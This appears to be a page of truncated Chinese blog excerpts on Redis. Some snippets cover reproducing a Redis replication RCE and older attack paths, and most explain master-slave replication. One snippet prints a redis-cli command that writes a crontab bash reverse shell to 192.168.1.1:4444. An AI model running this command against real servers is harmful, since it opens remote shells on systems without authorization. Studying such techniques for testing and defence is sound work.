0x00 前言 最近期末考試，博客好久沒有更新了，這段時間爆了三四個洞，趁着還沒去實習，抓緊復現一下，這次復現的是Redis的RCE，復現過程中也遇到很多問題，記錄下來和大家分享一下 0x01 拉取鏡像 docker確實是個好東西，有了它復現節省不少時間，首先拉取一個5.0鏡像 ...

攻擊場景： 實際上就是通過主從特性來 同步傳輸數據，同時利用模塊加載來加載惡意的用來進行命令執行的函數，從而進行rce redis之前的攻擊方法有 1.寫shell 但是對於網站根目錄而言，redis不一定據有寫權限 2.root權限寫crontab或者ssh ...

　　未授權無需認證訪問內部數據庫。 利用計划任務反彈shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...

主從復制概述 在Redis客戶端通過info replication可以查看與復制相關的狀態，對於了解主從節點的當前狀態，以及解決出現的問題都會有幫助。 主從復制，是指將一台Redis服務器的數據，復制到其他的Redis服務器。前者稱為主節點(master/leader)，后者稱為從節點 ...

一、簡介 Redis支持將數據同步到多台slave上，這種特性對提高讀取性能非常有益 1）master可以有多台slave 2) 除了多個slave連到相同master外，slave也可以連接到其它slave形成圖狀結構 3）主從復制不會阻塞master,也就是說當一個或多個slave ...

大家可以先看這篇文章ASP.NET Redis 開發對Redis有個初步的了解 Redis的主從復制功能非常強大，一個master可以擁有多個slave，而一個slave又可以擁有多個slave，如此下去，形成了強大的多級服務器集群架構。 在master上執行寫操作，在slave上面 ...

Redis 主從復制是指：將一台 Redis 服務器的數據復制到其它的 Redis 服務器，前者所在的 Redis 服務器也被稱為 “主節點”（Master / Leader），后者則被稱為 “從節點”（Slave / Follower）。數據從主節點復制到從節點，主節點的主要任務是實現寫入數據 ...

最近在看付磊，張益軍老師的《Redis開發與運維》。學到了很多，也遇到了很多坑，這里我想把比較重要的主從復制這一章節，我把自己的理解與實踐記錄下來，方便自己的學習，也為社區做一點貢獻。 (1)：一主二仆 概念： 主從復制最經典的結構就是 "一主二仆"。即一個master主機，兩個slave ...